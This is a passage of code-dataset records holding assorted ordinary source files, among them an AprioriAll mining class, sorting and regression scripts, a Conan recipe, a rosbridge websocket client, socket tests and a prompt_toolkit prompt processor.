mapNums=set()#maped num\n def __init__(self,baskets):\n self.baskets = baskets\n def setBaskets(self,baskets):\n self.baskets = baskets\n def setMapedNums(self,mapNums):\n self.mapNums = mapNums\n def __str__(self):\n mystr='Custom[ '\n for i in self.baskets:\n mystr = mystr + i.__str__() +' , '\n mystr += ']'\n return mystr\n def getMapedNums(self):\n return self.mapNums\n \nclass AprioriAll():\n customs=[]\n minSuppCount = 0#count number ,considering the min_supp and the num of transactions\n allBaskets=[]\n transMap={}\n def __init__(self,min_supp=0.4,datafile='aprioriall.txt'):\n inputfile = open(datafile,\"r\")\n self.min_supp = min_supp\n baskets=[]\n self.customs=[]\n for line in inputfile.readlines():\n if(line != \"\\n\"):\n items = re.compile(r\"\\w+\").findall(line)\n basket = Basket(items)\n baskets.append(basket)\n else:\n custom = Custom((baskets))\n self.customs.append(custom)\n baskets=[] \n #add the last custom \n custom = Custom((baskets))\n self.customs.append(custom)\n \n self.minSuppCount = math.ceil(min_supp * len(self.customs))\n \n def sortPhase(self):\n '''sort the transaction db :with customer-id as the major key and \n transaction-time as the minor key. 
'''\n        #has been done in the constructor\n        pass\n    \n    def litemsetPhase(self):\n        ''' find all the frequent-itemsets whose support is above the threshold'''\n        litemset = []\n        items = []\n        allBaskets = []\n        for custom in self.customs:\n            for basket in custom.baskets:\n                allBaskets.append(basket)\n                for item in basket.items:\n                    if [item] not in items:\n                        items.append([item])\n        \n        items.sort()\n        \n        # remove candidates below the threshold\n        candidates=items\n        while True:\n            temp=[]\n            for item1 in candidates:\n                count = 0\n                for basket in allBaskets:\n                    set1 = set(item1)\n                    if set1.issubset(basket.items):\n                        count += 1\n                if count >= self.minSuppCount:\n                    print(\"Frequent %d-itemset : %s\" %(len(item1),item1))\n                    temp.append(item1)\n                    litemset.append(item1)\n            \n            candidates = self.__genCandidate(temp)\n            if len(candidates) == 0 :\n                break\n        self.allBaskets = allBaskets\n        return litemset\n    \n    def transformationPhase(self,transmap):\n        for custom in self.customs:\n            mapNums=set()  # store the mapped numbers of each custom\n            for basket in custom.baskets:\n                for k in transmap.keys():\n                    s1 = set(transmap[k])\n                    s2 = set(basket.items)\n                    if s1.issubset(s2):\n                        mapNums.add(k)\n            custom.setMapedNums(mapNums) \n        \n    def sequencePhase(self,mapNums):\n        \n        item1set = set()\n        for num in mapNums :\n            item1set=item1set.union(num)\n        \n        item1list=list(item1set)\n        item1list.sort()\n        \n        seqresult=[]\n        candidates=[]\n        for item in item1list:\n            candidates.append([item])\n        while True:\n            for item in candidates:\n                count = 0 \n                for seq in mapNums:\n                    s1 = set(item)\n                    if s1.issubset(seq):\n                        count += 1\n                if count >= self.minSuppCount:\n                    print(\"Frequent %d-itemsets : %s\" %(len(item),item))\n                    seqresult.append(item) \n            candidates = self.__genCandidate(candidates) \n            if len(candidates) == 0 :\n                break\n        return seqresult\n    def maxSeq(self,seqs):\n        maxSeq=copy.deepcopy(seqs)\n        for seq in seqs:\n            t_set = set(seq)\n            for seq1 in seqs:\n                t_set1 = set(seq1)\n                if t_set1 != t_set and t_set1.issuperset(t_set):\n                    maxSeq.remove(seq)\n                    break\n        return self.__map2seq(maxSeq) \n    def createTransMap(self,litemset):\n        transmap = {}\n        value = 1\n        for each in litemset:\n            transmap[value]=each\n            value += 1\n        self.transMap = transmap\n        return transmap\n    \n    def __map2seq(self,seqs):\n        # transform a numeric sequence back to the original sequence\n        origSeqs = []\n        for seq in seqs:\n            origSeq=[]\n            for item in seq: \n                origSeq.append(self.transMap[item])\n            origSeqs.append(origSeq)\n        return origSeqs \n    def __genCandidate(self,frequentItems): \n        # generate new candidates, each extended by one item\n        length = len(frequentItems) \n        result = []\n        for i in range(length):\n            for j in range(i+1,length):\n                if self.__lastDiff(frequentItems[i],frequentItems[j]):\n                    item = copy.deepcopy(frequentItems[i])\n                    item.insert(len(frequentItems[i]),frequentItems[j][len(frequentItems[j])-1])\n                    if False == self.__has_inFrequentItemsets(frequentItems, item):\n                        result.append(item)\n        return result\n    # return True if some subset of item is missing from frequentItems \n    def __has_inFrequentItemsets(self,frequentItems,item):\n        subs = getSubSets(item,remove_origin=True)\n        for each in subs:\n            if(each == []):\n                continue\n            flag=False\n            for i in frequentItems:\n                if i == each:\n                    flag=True\n                    break \n            if flag==False:\n                return True \n        return False  # every subset is present in the frequent itemsets\n    \n    def __lastDiff(self,items1,items2):\n        if len(items2) != len(items1):#length should be the same\n            return False\n        if items1 == items2:#if all the same,return false\n            return False\n        return items1[:-1] == items2[:-1] \n\n\nif __name__ == '__main__':\n    aa = 
AprioriAll(min_supp=0.4,datafile='aprioriall2.txt')\n    litemset = aa.litemsetPhase()\n    print(\"litemset:\");print(litemset)\n    transmap = aa.createTransMap(litemset);\n    print(\"transformation map :\");print(transmap)\n    aa.transformationPhase(transmap)\n    customs = aa.customs\n    mapNums = []\n    for each in customs:\n        mapNums.append(each.getMapedNums())\n    seqNums = aa.sequencePhase(mapNums)\n    maxSeqs= aa.maxSeq(seqNums)\n    print(\"The sequential patterns :\");print(maxSeqs)","sub_path":"anonymous-msweb/aprioriall.py","file_name":"aprioriall.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"493458944","text":"# binary search for the insertion position of key in the sorted prefix A[0:i]\ndef search_pos(A, i, key):\n\tlow = 0\n\thigh = i - 1\n\twhile low <= high:\n\t\tmid = (low + high)//2\n\t\tif key < A[mid]:\n\t\t\thigh = mid - 1\n\t\telse:\n\t\t\tlow = mid + 1\n\treturn low\n\n# the same search with recursion, over the index range [low, high]\ndef search_pos_rec(A, key, low, high):\n\tif low > high:\n\t\treturn low\n\tmid = (low + high)// 2\n\tif key < A[mid]:\n\t\treturn search_pos_rec(A, key, low, mid - 1)\n\treturn search_pos_rec(A, key, mid + 1, high)\n\ndef binary_insertion_sort(A):\n\tfor i in range(1, len(A)):\n\t\tkey = A[i]\n\t\tpos = search_pos(A, i, key)\n\t\t# shift the larger elements one slot to the right, then place key\n\t\tfor j in range(i, pos, -1):\n\t\t\tA[j] = A[j - 1]\n\t\tA[pos] = key\n\treturn A\n","sub_path":"sort/binary_insertion_sort.py","file_name":"binary_insertion_sort.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"417825781","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\ndataset = pd.read_csv('Marketing_Data.csv')\nX = dataset.iloc[:, :-1]\ny = dataset.iloc[:, :1]\nprint(dataset)\nprint(X)\nprint(y)\n\n\n# In[3]:\n\n\ndataset.isnull().sum()\n\n\n# In[4]:\n\n\ndataset.head()\n\n\n# In[5]:\n\n\ndataset.tail()\n\n\n# In[6]:\n\n\ndataset.describe()\n\n\n# In[7]:\n\n\ndataset.info()\n\n\n# In[8]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 2)\nX_train, X_test, y_train, y_test\n\n\n# In[9]:\n\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n\n# In[10]:\n\n\ny_pred = regressor.predict(X_test)\ny_pred\n\n\n# In[13]:\n\n\nfor i in dataset.columns:\n    sns.boxplot(dataset[i])\n    plt.show()\n    \n\n\n# In[14]:\n\n\nfrom sklearn.metrics import r2_score, accuracy_score\nr2_score(y_test,y_pred)*100\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Mulitple_linear_Regression.py","file_name":"Mulitple_linear_Regression.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"338770205","text":"# -*- coding: utf-8-unix -*-\n\nfrom collections import defaultdict\nfrom pprint import pprint\n\nimport redmine_wrapper.lib as lib\nfrom redmine_wrapper.node import RedmineWrapperProjectNode\nfrom redmine_wrapper.node import RedmineWrapperIssueNode\n\n\nclass RedmineWrapperContainer(object):\n    def __init__(self, Node, url, rs):\n        self.each_result = []\n        self.url = url\n\n        self.node = dict([(r['id'], Node(r)) for r in rs])\n        self.version = dict([n.version() for n in self.node.values()])\n\n        node_v = dict()\n        for v in self.version:\n            node_v[v] = [id 
for id in self.node if self.node[id].version_id() == v]\n\n self.tree = {}\n for v in self.version:\n self.tree[v] = defaultdict(list)\n for pid in set([self.node[id].parent_id() for id in node_v[v]]):\n self.tree[v][pid] = [id for id in node_v[v]\n if self.node[id].parent_id() is pid]\n\n self.sort()\n\n\n def sort(self):\n for v in self.tree:\n for id in self.tree[v]:\n self.tree[v][id].sort(\n key=lambda x:(self.node[x].start(), self.node[x].id())\n )\n\n\n def each(self, vfunc, func, gen = 0, id = None):\n self.each_result = []\n for v in self.version:\n flag, g, result = vfunc(v, self.version[v])\n if flag == True:\n self.each_result.append(result)\n gen += g\n self._each(func, v, gen, id)\n return self.each_result\n\n\n def _each(self, func, ver, gen, id):\n flag = True\n next_gen = gen\n if id is not None:\n flag, result = func(self.node[id], gen)\n self.each_result.append(result)\n next_gen += 1\n if flag == True:\n for next_id in self.tree[ver][id]:\n self._each(func, ver, next_gen, next_id)\n\n\nclass RedmineWrapperProjectContainer(RedmineWrapperContainer):\n def __init__(self, url, rs, **kwargs):\n super().__init__(RedmineWrapperProjectNode, url, rs)\n self.filter(**kwargs)\n\n\n def filter(self, **kwargs):\n if 'project_id' in kwargs:\n value = int(kwargs['project_id'])\n for v in self.version:\n for id in list(self.tree[v].keys()):\n if id != value:\n del self.tree[v][id]\n self.tree[v][None] = [value]\n\n if 'subproject_id' in kwargs:\n value = kwargs['subproject_id']\n if value == '!*':\n for v in self.version:\n for id in self.tree[v][None]:\n if id in self.tree[v]:\n del self.tree[v][id]\n else:\n value = int(value)\n for v in self.version:\n for id in self.tree[v][None]:\n self.tree[v][id] = [value] if value in self.tree[v][id] else []\n\n\n def text(self):\n def vfunc(id, name):\n return (False, None, None)\n\n def func(node, gen):\n return (True, node.text(gen))\n\n result = self.each(vfunc, func)\n return '\\n'.join(result).format(__url__=self.url)\n\n\n def markdown(self):\n pass\n\n\n def html(self):\n pass\n\n\nclass RedmineWrapperIssueContainer(RedmineWrapperContainer):\n def __init__(self, url, rs, **kwargs):\n super().__init__(RedmineWrapperIssueNode, url, rs)\n self.filter(**kwargs)\n\n\n def filter(self, **kwargs):\n for key, value in kwargs.items():\n if key == 'period':\n s = lib.str2date(value[0])\n e = lib.str2date(value[1])\n for v in self.version:\n for pid in self.tree[v]:\n self.tree[v][pid] = [id for id in self.tree[v][pid]\n if self.node[id].within(s, e)]\n if key == 'start':\n s = lib.str2date(value)\n for v in self.version:\n for pid in self.tree[v]:\n self.tree[v][pid] = [id for id in self.tree[v][pid]\n if s <= self.node[id].start()]\n if key == 'end':\n e = lib.str2date(value)\n for v in self.version:\n for pid in self.tree[v]:\n self.tree[v][pid] = [id for id in self.tree[v][pid]\n if self.node[id].end() < e]\n\n\n def text(self):\n def vfunc(id, name):\n return (True, 0, '(({}))'.format(name))\n\n def func(node, gen):\n return (True, node.text(gen))\n\n result = self.each(vfunc, func)\n return '\\n'.join(result).format(__url__=self.url)\n\n\n def markdown(self):\n pass\n\n\n def html(self):\n pass\n\n","sub_path":"redmine_wrapper/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"509994639","text":"import os\n\nfrom conans import ConanFile, tools, AutoToolsBuildEnvironment, MSBuild\nfrom conans.tools import 
Version\n\n\nclass LcmsConan(ConanFile):\n name = \"lcms\"\n url = \"https://github.com/conan-io/conan-center-index\"\n description = \"A free, open source, CMM engine.\"\n license = \"MIT\"\n homepage = \"https://github.com/mm2/Little-CMS\"\n topics = (\"conan\", \"lcms\", \"cmm\", \"icc\", \"cmm-engine\")\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\"shared\": [True, False], \"fPIC\": [True, False]}\n default_options = {\"shared\": False, \"fPIC\": True}\n generators = \"cmake\"\n _source_subfolder = \"source_subfolder\"\n\n def build_requirements(self):\n if tools.os_info.is_windows and \"CONAN_BASH_PATH\" not in os.environ and \\\n tools.os_info.detect_windows_subsystem() != \"msys2\":\n self.build_requires(\"msys2/20190524\")\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n del self.settings.compiler.libcxx\n del self.settings.compiler.cppstd\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n os.rename(\"Little-CMS-lcms%s\" % self.version, self._source_subfolder)\n\n def _build_visual_studio(self):\n # since VS2015 vsnprintf is built-in\n if Version(self.settings.compiler.version) >= \"14\":\n path = os.path.join(self._source_subfolder, \"src\", \"lcms2_internal.h\")\n tools.replace_in_file(path, \"# define vsnprintf _vsnprintf\", \"\")\n\n with tools.chdir(os.path.join(self._source_subfolder, \"Projects\", \"VC2013\")):\n target = \"lcms2_DLL\" if self.options.shared else \"lcms2_static\"\n upgrade_project = Version(self.settings.compiler.version) > \"12\"\n # run build\n msbuild = MSBuild(self)\n msbuild.build(\"lcms2.sln\", targets=[target], platforms={\"x86\": \"Win32\"}, upgrade_project=upgrade_project)\n\n def _build_configure(self):\n if self.settings.os == \"Android\" and tools.os_info.is_windows:\n # remove escape for quotation marks, to make ndk on windows happy\n tools.replace_in_file(os.path.join(self._source_subfolder, \"configure\"),\n \"s/[\t `~#$^&*(){}\\\\\\\\|;'\\\\\\''\\\"<>?]/\\\\\\\\&/g\", \"s/[\t `~#$^&*(){}\\\\\\\\|;<>?]/\\\\\\\\&/g\")\n env_build = AutoToolsBuildEnvironment(self, win_bash=tools.os_info.is_windows)\n with tools.chdir(self._source_subfolder):\n args = [\"prefix=%s\" % self.package_folder]\n if self.options.shared:\n args.extend([\"--disable-static\", \"--enable-shared\"])\n else:\n args.extend([\"--disable-shared\", \"--enable-static\"])\n args.append(\"--without-tiff\")\n args.append(\"--without-jpeg\")\n env_build.configure(args=args)\n env_build.make()\n env_build.make(args=[\"install\"])\n\n def build(self):\n if self.settings.compiler == \"Visual Studio\":\n self._build_visual_studio()\n else:\n self._build_configure()\n\n def package(self):\n self.copy(pattern=\"COPYING\", dst=\"licenses\", src=self._source_subfolder)\n if self.settings.compiler == \"Visual Studio\":\n self.copy(pattern=\"*.h\", src=os.path.join(self._source_subfolder, \"include\"), dst=\"include\", keep_path=True)\n if self.options.shared:\n self.copy(pattern=\"*.lib\", src=os.path.join(self._source_subfolder, \"bin\"), dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.dll\", src=os.path.join(self._source_subfolder, \"bin\"), dst=\"bin\", keep_path=False)\n else:\n self.copy(pattern=\"*.lib\", src=os.path.join(self._source_subfolder, \"Lib\", \"MS\"), dst=\"lib\",\n keep_path=False)\n # remove entire share directory\n tools.rmdir(os.path.join(self.package_folder, \"share\"))\n # remove pkgconfig\n 
tools.rmdir(os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n # remove la files\n la = os.path.join(self.package_folder, \"lib\", \"liblcms2.la\")\n if os.path.isfile(la):\n os.unlink(la)\n # remove binaries\n for bin_program in [\"tificc\", \"linkicc\", \"transicc\", \"psicc\", \"jpgicc\"]:\n for ext in [\"\", \".exe\"]:\n try:\n os.remove(os.path.join(self.package_folder, \"bin\", bin_program + ext))\n except:\n pass\n\n def package_info(self):\n if self.settings.compiler == \"Visual Studio\":\n self.cpp_info.libs = [\"lcms2\" if self.options.shared else \"lcms2_static\"]\n if self.options.shared:\n self.cpp_info.defines.append(\"CMS_DLL\")\n else:\n self.cpp_info.libs = [\"lcms2\"]\n","sub_path":"recipes/lcms/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"441914259","text":"#!/usr/bin/env python\n# Note that this needs:\n# sudo pip install websocket-client\n# not the library called 'websocket'\n\nimport json\nfrom uuid import uuid4\nimport websocket\nimport yaml\nfrom geometry_msgs.msg import PoseStamped\nimport rospy\nfrom std_msgs.msg import Header,String,Float32,Int8\nfrom sensor_msgs.msg import CompressedImage,Image\nfrom rospy_message_converter import message_converter\nimport cv2\nimport numpy as np\n\nclass WebsocketROSClient(object):\n def __init__(self, websocket_ip, port=9090):\n \"\"\"\n Class to manage publishing to ROS thru a rosbridge websocket.\n :param str websocket_ip: IP of the machine with the rosbridge server.\n :param int port: Port of the websocket server, defaults to 9090.\n \"\"\"\n #print(\"Connecting to websocket: {}:{}\".format(websocket_ip, port))\n \n self.ws = websocket.create_connection(\n 'ws://' + websocket_ip + ':' + str(port))\n self._advertise_dict = {}\n\n def _advertise(self, topic_name, topic_type):\n \"\"\"\n Advertise a topic with it's type in 'package/Message' format.\n :param str topic_name: ROS topic name.\n :param str topic_type: ROS topic type, e.g. std_msgs/String.\n :returns str: ID to de-advertise later on.\n \"\"\"\n new_uuid = str(uuid4())\n self._advertise_dict[new_uuid] = {'topic_name': topic_name,\n 'topic_type': topic_type}\n advertise_msg = {\"op\": \"advertise\",\n \"id\": new_uuid,\n \"topic\": topic_name,\n \"type\": topic_type\n }\n self.ws.send(json.dumps(advertise_msg))\n return new_uuid\n\n def _unadvertise(self, uuid):\n unad_msg = {\"op\": \"unadvertise\",\n \"id\": uuid,\n # \"topic\": topic_name\n }\n self.ws.send(json.dumps(unad_msg))\n \n def __del__(self):\n \"\"\"Cleanup all advertisings\"\"\"\n d = self._advertise_dict\n for k in d:\n self._unadvertise(k)\n\n def _publish(self, topic_name, message):\n \"\"\"\n Publish onto the already advertised topic the msg in the shape of\n a Python dict.\n :param str topic_name: ROS topic name.\n :param dict msg: Dictionary containing the definition of the message.\n \"\"\"\n msg = {\n 'op': 'publish',\n 'topic': topic_name,\n 'msg': message\n }\n json_msg = json.dumps(msg)\n self.ws.send(json_msg)\n\n def publish(self, topic_name, ros_message):\n \"\"\"\n Publish on a topic given ROS message thru rosbridge.\n :param str topic_name: ROS topic name.\n :param * ros_message: Any ROS message instance, e.g. 
LaserScan()\n from sensor_msgs/LaserScan.\n \"\"\"\n # First check if we already advertised the topic\n d = self._advertise_dict\n for k in d:\n if d[k]['topic_name'] == topic_name:\n # Already advertised, do nothing\n break\n else:\n # Not advertised, so we advertise\n topic_type = ros_message._type\n self._advertise(topic_name, topic_type)\n # Converting ROS message to a dictionary thru YAML\n ros_message_as_dict = yaml.load(ros_message.__str__(), Loader=yaml.FullLoader)\n # Publishing\n self._publish(topic_name, ros_message_as_dict)\n\n def subscribe(self,topic_name, ros_message):\n # First check if we already advertised the topic\n d = self._advertise_dict\n for k in d:\n if d[k]['topic_name'] == topic_name:\n # Already advertised, do nothing\n break\n else:\n # Not advertised, so we advertise\n topic_type = ros_message._type\n self._advertise(topic_name, topic_type)\n # Converting ROS message to a dictionary thru YAML\n ros_message_as_dict = yaml.load(ros_message.__str__(), Loader=yaml.FullLoader)\n # Publishing\n return self._subscribe(topic_name, ros_message_as_dict, ros_message._type)\n\n def _subscribe(self, topic_name, message, type):\n \"\"\"\n Publish onto the already advertised topic the msg in the shape of\n a Python dict.\n :param str topic_name: ROS topic name.\n :param dict msg: Dictionary containing the definition of the message.\n \"\"\"\n msg = {\n 'op': 'subscribe',\n 'topic': topic_name,\n 'type' : type\n }\n json_msg = json.dumps(msg)\n self.ws.send(json_msg)\n json_message = self.ws.recv()\n\n dictionary = json.loads(json_message)['msg']\n result = message_converter.convert_dictionary_to_ros_message(type, dictionary)\n #print(\"Type: '%s' \\n Received: '%s'\" % (type, result))\n return result\n\n#if __name__ == '__main__':\n# connect = WebsocketROSClient('127.0.0.1')\n \n","sub_path":"goodgame_fptu_dl/scripts/extensions/rosws.py","file_name":"rosws.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"143825915","text":"#\n# @section License\n#\n# The MIT License (MIT)\n# \n# Copyright (c) 2016, Erik Moqvist\n# \n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use, copy,\n# modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS\n# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN\n# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n# This file is part of the Pumbaa project.\n#\n\n\nimport select\nimport socket\nimport harness\nfrom harness import assert_raises\n\n\ndef test_print():\n print(socket)\n\n\ndef test_tcp_client():\n client = socket.socket()\n client.connect((\"192.168.1.101\", 80))\n assert client.send(b'foo') == 3\n assert client.recv(3) == b'bar'\n client.close()\n\n\ndef test_tcp_server():\n listener = socket.socket()\n listener.bind((\"192.168.1.102\", 8080))\n listener.listen(5)\n listener.accept()\n listener.close()\n\n\ndef test_udp():\n socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n\ndef test_select():\n poll = select.poll()\n tcp = socket.socket()\n\n # Register both event channels.\n poll.register(tcp)\n\n # Timeout waiting for data on the socket.\n assert poll.poll(0.01) == []\n\n tcp.close()\n\n\ndef test_bad_arguments():\n # Bad socket family.\n with assert_raises(OSError):\n socket.socket(-1)\n\n # Bad socket type.\n with assert_raises(OSError):\n socket.socket(socket.AF_INET, -1)\n\n\ndef main():\n testcases = [\n (test_print, \"test_print\"),\n (test_tcp_client, \"test_tcp_client\"),\n (test_tcp_server, \"test_tcp_server\"),\n (test_udp, \"test_udp\"),\n (test_select, \"test_select\"),\n (test_bad_arguments, \"test_bad_arguments\")\n ]\n harness.run(testcases)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tst/socket/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"273136726","text":"import abc\nimport enum\n\nfrom . 
import t_tkinter\nfrom misc import Path\nfrom misc.Windows import w as Windows\n\n@enum.unique\nclass ColorSchemeEnum(enum.Enum):\n background = 'gray10'\n transparent = 'white'\n p1_text = '#93A1A1'\n p2_text = '#586E75'\n system_text = 'lawn green'\n advantage_plus = 'DodgerBlue2'\n advantage_slight_minus = 'ivory2'\n advantage_safe_minus = 'ivory3'\n advantage_punishible = 'orchid2'\n advantage_very_punishible = 'deep pink'\n advantage_text = 'black'\n\nclass Overlay:\n padding = 15\n\n @abc.abstractmethod\n def update_state(self):\n pass\n\n @abc.abstractmethod\n def get_geometry(self):\n pass\n\n def __init__(self):\n self.visible = False\n\n window_name = self.get_name()\n print(\"Launching {}\".format(window_name))\n\n self.toplevel = t_tkinter.Toplevel()\n\n self.toplevel.wm_title(window_name)\n self.toplevel.iconbitmap(Path.path('./img/tekken_bot_close.ico'))\n self.toplevel.overrideredirect(True)\n\n self.background_color = ColorSchemeEnum.background.value\n self.tranparency_color = self.background_color\n self.toplevel.configure(background=self.tranparency_color)\n\n self.toplevel.attributes(\"-topmost\", True)\n\n def get_name(self):\n return self.__class__.__name__\n\n def update_location(self, game_reader):\n if Windows.valid:\n tekken_rect = game_reader.get_window_rect()\n else:\n tekken_rect = FullscreenTekkenRect(self.toplevel)\n if tekken_rect is not None:\n x, y = self.get_geometry(tekken_rect)\n geometry = '+%d+%d' % (x, y)\n self.toplevel.geometry(geometry)\n if not self.visible:\n self.show()\n else:\n self.hide()\n\n def show(self):\n self.toplevel.deiconify()\n self.visible = True\n\n def hide(self):\n self.toplevel.withdraw()\n self.visible = False\n\nclass FullscreenTekkenRect:\n def __init__(self, toplevel):\n self.left = 0\n self.right = toplevel.winfo_screenwidth()\n self.top = 0\n self.bottom = toplevel.winfo_screenheight()\n","sub_path":"src/gui/Overlay.py","file_name":"Overlay.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"186047610","text":"import uuid\n\nfrom app.main import db\nfrom app.main.model.favorites import Favorites\nfrom app.main.model.application import Application\n\ndef favorites_list(user_email):\n return Favorites.query.filter_by(user_email=user_email).all()\n\ndef favorites_save(data):\n application = Application.query.filter_by(public_id=data['application_public_id']).first()\n favorites = Favorites.query.filter_by(user_email=data['user_email']).filter_by(application_public_id=data['application_public_id']).first()\n if not favorites:\n new_favorites = Favorites(\n public_id=str(uuid.uuid4()),\n user_email=data['user_email'],\n application_public_id=data['application_public_id'],\n application_name=application.name,\n application_category=application.category,\n application_rating_average=application.rating_average,\n application_image_logo=application.image_logo,\n application_price=application.price\n )\n save_changes(new_favorites)\n response_object = {\n 'status': 'success',\n 'message': 'Successfully saved.',\n }\n return response_object, 201\n else:\n response_object = {\n 'status': 'fail',\n 'message': 'favorites already exists.',\n }\n return response_object, 409\n\ndef favorites_remove(public_id):\n favorites = Favorites.query.filter_by(public_id=public_id).first()\n remove_changes(favorites)\n response_object = {\n 'status': 'success',\n 'message': 'Successfully removed.',\n }\n return response_object, 200\n\ndef 
save_changes(data):\n    db.session.add(data)\n    db.session.commit()\n\ndef remove_changes(data):\n    db.session.delete(data)\n    db.session.commit()","sub_path":"apppedia/app/main/service/favorites_service.py","file_name":"favorites_service.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"400429064","text":"from project import db\nfrom project.api.models import List, Item\n\n\ndef add_list(title):\n    new_list = List(title=title)\n    db.session.add(new_list)\n    db.session.commit()\n    return new_list\n\n\ndef add_item(item, list_id):\n    new_item = Item(item=item, list_id=list_id)\n    db.session.add(new_item)\n    db.session.commit()\n    return new_item\n","sub_path":"services/todolist/project/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"368482892","text":"test_dict = {'gfg' : [5, 6, 7, 8],\n             'is' : [10, 11, 7, 5],\n             'best' : [6, 12, 10, 8],\n             'for' : [1, 2, 5]}\nk=[]\ns=[]\n# flatten every value list of the dictionary into one list\nfor i in test_dict.values():\n    print(i)\n    s.extend(i)\nprint(s)\n# keep only the unique values\nfor m in s:\n    if m not in k:\n        k.append(m)\n\nprint(k)\nk.sort()\nprint(k)\nprint(max(k))\nprint(min(k))\n","sub_path":"Programs/Dictionary/Extract Unique values dictionary values.py","file_name":"Extract Unique values dictionary values.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"521443441","text":"from __future__ import unicode_literals\n\nfrom pygments.token import Token\nfrom ..enums import IncrementalSearchDirection\nfrom .utils import token_list_len\nfrom .processors import Processor\n\n__all__ = (\n    'DefaultPrompt',\n)\n\n\nclass DefaultPrompt(Processor):\n    \"\"\"\n    Default prompt. 
This one shows the 'arg' and reverse search like\n    Bash/readline normally do.\n    \"\"\"\n    def __init__(self, prompt='> '):\n        self.prompt = prompt\n\n    def run(self, cli, buffer, tokens):\n        # Get text before cursor.\n        if buffer.isearch_state:\n            before = _get_isearch_tokens(buffer.isearch_state)\n\n        elif cli.input_processor.arg is not None:\n            before = _get_arg_tokens(cli)\n\n        else:\n            before = [(Token.Prompt, self.prompt)]\n\n        # Insert before buffer text.\n        shift_position = token_list_len(before)\n\n        return before + tokens, lambda i: i + shift_position\n\n    def invalidation_hash(self, cli, buffer):\n        return (\n            cli.input_processor.arg,\n            buffer.isearch_state,\n            buffer.isearch_state and buffer.isearch_state.isearch_text,\n        )\n\n\ndef _get_isearch_tokens(isearch_state):\n    def before():\n        if isearch_state.isearch_direction == IncrementalSearchDirection.BACKWARD:\n            text = 'reverse-i-search'\n        else:\n            text = 'i-search'\n\n        return [(Token.Prompt.Search, '(%s)`' % text)]\n\n    def text():\n        index = isearch_state.no_match_from_index\n        text = isearch_state.isearch_text\n\n        if index is None:\n            return [(Token.Prompt.Search.Text, text)]\n        else:\n            return [\n                (Token.Prompt.Search.Text, text[:index]),\n                (Token.Prompt.Search.Text.NoMatch, text[index:])\n            ]\n\n    def after():\n        return [(Token.Prompt.Search, '`: ')]\n\n    return before() + text() + after()\n\n\ndef _get_arg_tokens(cli):\n    \"\"\"\n    Tokens for the arg-prompt.\n    \"\"\"\n    arg = cli.input_processor.arg\n\n    return [\n        (Token.Prompt.Arg, '(arg: '),\n        (Token.Prompt.Arg.Text, str(arg)),\n        (Token.Prompt.Arg, ') '),\n    ]\n","sub_path":"prompt_toolkit/layout/prompt.py","file_name":"prompt.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
